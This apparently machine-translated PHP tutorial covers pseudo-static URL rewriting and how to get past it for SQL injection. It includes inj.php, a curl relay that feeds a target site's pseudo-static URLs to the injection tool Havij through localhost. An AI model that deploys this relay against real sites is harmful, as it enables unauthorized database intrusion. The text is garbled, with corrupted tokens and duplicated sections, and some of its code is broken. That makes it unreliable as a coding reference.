The principle of PHP pseudo static technology and the realization of the breakthrough principle are introduced
- 2020-07-21 07:19:16
- OfStack
First, the implementation method:
inj.php:
Use wamp builds a server, the above inj. php into wamp www /, and then run in Havij http: / / 127.0.0.1 inj php? id = 1
=============================
PHP pseudo-static implementation approach 1 (leveraging the capabilities of the Apache server)
1. Check whether Apache supports mod_rewrite
2. Make Apache support.htaccess
3. Set up.ES28en file
4. Rules:
RewriteEngine on
RewriteRule ([a-zA-Z]{1,})-([0-9]{1,}).html$index.php?action=$1 & id=$2
([a zA - Z] {1}) - ([0-9] {1}) is URL looks like
$1 is matched by ([a-ES43en-ES44en]{1,})
$2 is what [0-9]{1,} matches
For example: www. xx. com/page - 18. html
The real URL is as follows:
action = page
id = 18
============================
PHP Pseudo-static Implementation Method 2 (Coding implementation)
$Php2Html_FileUrl = $_SERVER["REQUEST_URI"]
echo $Php2Html_FileUrl
Example: / / localhost php100 test php? 1 @ action id | | 2
============================
PHP Pseudo-static Implementation Method 3 (Coding implementation)
Example: localhost/php100 / test php / 1/2
============================
PHP Pseudo-Static Implementation Method 4 (Coding Implementation)
============================
PHP Pseudo-Static Implementation Method 5 (Coding implementation)
Example: / 1100863 0. html
Summary:
(1) Pseudo-static technology is a good breakthrough, the need to construct their own transfer injection page.
(2) Pseudo static technology principle is very simple, is the original ES103en. php? id=1 this form of URL is substituted for other forms.
inj.php:
<?php
set_time_limit(10);
$id=$_GET["id"];
$id=str_replace(" ","%20",$id);
$id=str_replace("=","%3D",$id);
$url="http://www.xxx.com/index.php/library/more/id/$id.html";
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,"$url");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);// When enabled will curl_init() The obtained information is returned as a stream of files rather than as direct output
curl_setopt($ch,CURLOPT_HEADER,0);// When enabled, the information in the header file is output as a data stream
$output=curl_exec($ch);
curl_close($ch);
print_r($output);
?>
Use wamp builds a server, the above inj. php into wamp www /, and then run in Havij http: / / 127.0.0.1 inj php? id = 1
=============================
PHP pseudo-static implementation approach 1 (leveraging the capabilities of the Apache server)
1. Check whether Apache supports mod_rewrite
2. Make Apache support.htaccess
3. Set up.ES28en file
4. Rules:
RewriteEngine on
RewriteRule ([a-zA-Z]{1,})-([0-9]{1,}).html$index.php?action=$1 & id=$2
([a zA - Z] {1}) - ([0-9] {1}) is URL looks like
$1 is matched by ([a-ES43en-ES44en]{1,})
$2 is what [0-9]{1,} matches
For example: www. xx. com/page - 18. html
The real URL is as follows:
action = page
id = 18
============================
PHP Pseudo-static Implementation Method 2 (Coding implementation)
$Php2Html_FileUrl = $_SERVER["REQUEST_URI"]
echo $Php2Html_FileUrl
Example: / / localhost php100 test php? 1 @ action id | | 2
$Php2Html_UrlString = str_replace("?","",str_replace("/","",strrchr(strrchr($Php2Html_FileUrl,"/"),"?")) ))
/*
The inner layer of the strrchr Come out: /test.php?id|1@action|2
The outer strrchr Come out: id|1@action|2
The inner layer of the str_replace Out: / Get rid of the number, in this case There is no
The outer str_replace Out: ? Get rid of the number, in this case There is no
*/
$Php2Html_UrlQueryStrList = explode("@",$Php2Html_UrlString);
/* the str Into a @ Array divided by bounds: id|1 and action|2*/
foreach($Php2Html_UrlQueryStrList as $Php2Html_UrlQueryStr)
{
$Php2Html_TmpArray = explode("|",$Php2Html_UrlQueryStr);
/* id => 1 and action => 2*/
$_GET[$Php2Html_TmpArray[0]] = $Php2Html_TmpArray[1];
}
============================
PHP Pseudo-static Implementation Method 3 (Coding implementation)
Example: localhost/php100 / test php / 1/2
$filename = basename($_SERVER["SCRIPT_NAME"]);
echo $_SERVER["SCRIPT_NAME"];
echo $filename;
if(strtolower($filename) == 'test.php'){
if(!empty($_GET[id])){
$id=intval($_GET[id]);
echo $id;
$action = intval($_GET[action]);
echo $action;
}else{
$nav=$_SERVER["REQUEST_URI"];
$script=$_SERVER["SRCIPT_NAME"];
// This sentence should be put URL Get rid of the front part. The remaining "1/2" Something like that.
$nav=ereg_replace("$script","",urldecode($nav));
echo $nav;
$vars = explode("/",$nav);
print_r($vars);
$id=intval($vars[1]);
$action=intval($vars[2]);
}
echo $id.'&'.$action;
}
============================
PHP Pseudo-Static Implementation Method 4 (Coding Implementation)
function mod_rewrite(){
global $_GET;
$nav = $_SERVER["REQUEST_URI"];
$script_name = $_SERVER["SCRIPT_NAME"]
$nav=substr(ereg_replace("$script_name"),"",urldecode($nav)),1);
$nav=preg_replace("/^.ht(m){1}(l){0,1}$/","",$nav);// Tail-Removed htm or html
$vars=explode("/",$nav);
print_r($vars);
for($i=0;$i<count($vars);$i+=2)
{
$_GET[$vars[$i]] = $vars[$i+1];
}
return $_GET;
}
============================
PHP Pseudo-Static Implementation Method 5 (Coding implementation)
Example: / 1100863 0. html
if(preg_match( " /\/(\d+),(\d+),(\d+)\.html/si " ,$path_info,$arr_path)){
$gid =intval($arr_path[1]); // Obtains the value 1
$sid =intval($arr_path[2]); // Obtains the value 100
$softid =intval($arr_path[3]); // Obtains the value 8630
}
else
echo "Path:Error!";
Summary:
(1) Pseudo-static technology is a good breakthrough, the need to construct their own transfer injection page.
(2) Pseudo static technology principle is very simple, is the original ES103en. php? id=1 this form of URL is substituted for other forms.